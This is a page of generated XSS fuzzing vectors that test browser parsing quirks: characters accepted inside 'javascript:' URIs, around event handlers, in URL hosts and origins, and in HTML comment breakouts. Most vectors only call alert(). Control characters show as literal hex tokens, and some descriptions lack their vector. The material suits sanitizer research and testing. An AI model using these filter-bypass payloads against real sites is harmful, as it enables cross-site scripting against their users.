Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 174 vectors with results
char = String.fromCodePoint(60)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
new URL(url)0x0D
}0x0D
catch(e){0x0D
anchor.href=url0x0D
if(anchor.protocol !== ':'){alert(60)}0x0D
}char = String.fromCodePoint(62)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
new URL(url)0x0D
}0x0D
catch(e){0x0D
anchor.href=url0x0D
if(anchor.protocol !== ':'){alert(62)}0x0D
}char = String.fromCodePoint(64)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
new URL(url)0x0D
}0x0D
catch(e){0x0D
anchor.href=url0x0D
if(anchor.protocol !== ':'){alert(64)}0x0D
}char = String.fromCodePoint(91)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
new URL(url)0x0D
}0x0D
catch(e){0x0D
anchor.href=url0x0D
if(anchor.protocol !== ':'){alert(91)}0x0D
}char = String.fromCodePoint(92)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
new URL(url)0x0D
}0x0D
catch(e){0x0D
anchor.href=url0x0D
if(anchor.protocol !== ':'){alert(92)}0x0D
}try { v = "javasc$ript$:(1)"; if (eval(v)) { console.alert(v); alert('36') } } catch(e) { v = '' }Find what characters are allowable inside `javascript` in `eval` (redundant much?)
try { v = "javasc_ript_:(1)"; if (eval(v)) { console.alert(v); alert('95') } } catch(e) { v = '' }Find what characters are allowable inside `javascript` in `eval` (redundant much?)
try { v = "javascªriptª:(1)"; if (eval(v)) { console.alert(v); alert('170') } } catch(e) { v = '' }Find what characters are allowable inside `javascript` in `eval` (redundant much?)
try { v = "javascµriptµ:(1)"; if (eval(v)) { console.alert(v); alert('181') } } catch(e) { v = '' }Find what characters are allowable inside `javascript` in `eval` (redundant much?)
<img src=x onerror0x09=alert(9)>I want to know which characters the browser accepts between an event handler and a equal sign.
I want to know which characters the browser accepts between an event handler and a equal sign.
<img src=x onerror0x0C=alert(12)>I want to know which characters the browser accepts between an event handler and a equal sign.
<img src=x onerror0x0D=alert(13)>I want to know which characters the browser accepts between an event handler and a equal sign.
I want to know which characters the browser accepts between an event handler and a equal sign.
<a href="javascript0x09:" id=x></a>This tests for chars allowed before the colon in a Javascript uri format.
<a href="javascript
:" id=x></a><a href="javascript0x0D:" id=x></a>This tests for chars allowed before the colon in a Javascript uri format.
<a href="javascript::" id=x></a>if (new URL("https://example.com" + String.fromCodePoint(0)).hostname === 'example.com'){alert(0)}Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"
if (new URL("https://example.com" + String.fromCodePoint(1)).hostname === 'example.com'){alert(1)}Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"
if (new URL("https://example.com" + String.fromCodePoint(2)).hostname === 'example.com'){alert(2)}Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"
if (new URL("https://example.com" + String.fromCodePoint(3)).hostname === 'example.com'){alert(3)}Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"
if (new URL("https://example.com" + String.fromCodePoint(4)).hostname === 'example.com'){alert(4)}Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"
<! <a/b="--><img/src/onerror=alert(1)>"This vector shows which characters can be used after the "<" character and act as an HTML comment
</ <a/b="--><img/src/onerror=alert(1)>"This vector shows which characters can be used after the "<" character and act as an HTML comment
<? <a/b="--><img/src/onerror=alert(1)>"This vector shows which characters can be used after the "<" character and act as an HTML comment
if (new URL("https://google.com0x090x09/endpoint").origin=="https://google.com"){alert(9)}Characters ignored in URL, which yield in the same Origin
if (new URL("https://google.com##/endpoint").origin=="https://google.com"){alert(35)}if (new URL("https://google.com///endpoint").origin=="https://google.com"){alert(47)}if (new URL("https://google.com??/endpoint").origin=="https://google.com"){alert(63)}if (new URL("https://google.com\\/endpoint").origin=="https://google.com"){alert(92)}<p><img/src/onerror=alert(1)></p>Looking for potentially a way to bypass the removal of < tags. (assume the <p> tags are being returned by the application)
if (new URL("javascript0x09:alert()").protocol=="javascript:"){alert(9)}Vector to check if any characters are allowed between javascript and : to still result in a javascript url.
if (new URL("javascript::alert()").protocol=="javascript:"){alert(58)}Vector to check if any characters are allowed between javascript and : to still result in a javascript url.
if (new URL("javascript\:alert()").protocol=="javascript:"){alert(92)}Vector to check if any characters are allowed between javascript and : to still result in a javascript url.
This vector shows what characters can be used to separate HTML attributes, also allowing multiple attributes
This vector shows what characters can be used to separate HTML attributes, also allowing multiple attributes
This vector shows what characters can be used to separate HTML attributes, also allowing multiple attributes
This vector shows what characters can be used to separate HTML attributes, also allowing multiple attributes
This vector shows what characters can be used to separate HTML attributes, also allowing multiple attributes
<input id="test" value="s0x00onload="alert(1)" />Characters that can break out of an inline value with double quotes
if (['https:'].includes("\https:")){0x0D
alert(92)0x0D
}Check for chars allowed before the string to validate.
Characters that can be replace opening angle bracket and still form a valid HTML element
<img src=x><img/src/onerror=alert(1)>Characters that can be used to close or encapsulate HTML attribute values.
Characters that can be used to close or encapsulate HTML attribute values.
Characters that can be used to close or encapsulate HTML attribute values.
Characters that can be used to close or encapsulate HTML attribute values.
Characters that can be used to close or encapsulate HTML attribute values.
<!----!>><img/src/onerror=alert(1)>if (new URL("https://0x09localhost/endpoint").host == "localhost") {0x0D
alert(9);0x0D
}This vector will test what characters can be inserted between the protocol separator (//) and the domain (localhost) in a URL (e.g., https://{X}localhost/endpoint) while still allowing the browser to resolve the host property as "localhost".
if (new URL("https:///localhost/endpoint").host == "localhost") {0x0D
alert(47);0x0D
}This vector will test what characters can be inserted between the protocol separator (//) and the domain (localhost) in a URL (e.g., https://{X}localhost/endpoint) while still allowing the browser to resolve the host property as "localhost".
if (new URL("https://@localhost/endpoint").host == "localhost") {0x0D
alert(64);0x0D
}This vector will test what characters can be inserted between the protocol separator (//) and the domain (localhost) in a URL (e.g., https://{X}localhost/endpoint) while still allowing the browser to resolve the host property as "localhost".
if (new URL("https://\localhost/endpoint").host == "localhost") {0x0D
alert(92);0x0D
}This vector will test what characters can be inserted between the protocol separator (//) and the domain (localhost) in a URL (e.g., https://{X}localhost/endpoint) while still allowing the browser to resolve the host property as "localhost".
if (new URL("https://localhost/endpoint").host == "localhost") {0x0D
alert(173);0x0D
}This vector will test what characters can be inserted between the protocol separator (//) and the domain (localhost) in a URL (e.g., https://{X}localhost/endpoint) while still allowing the browser to resolve the host property as "localhost".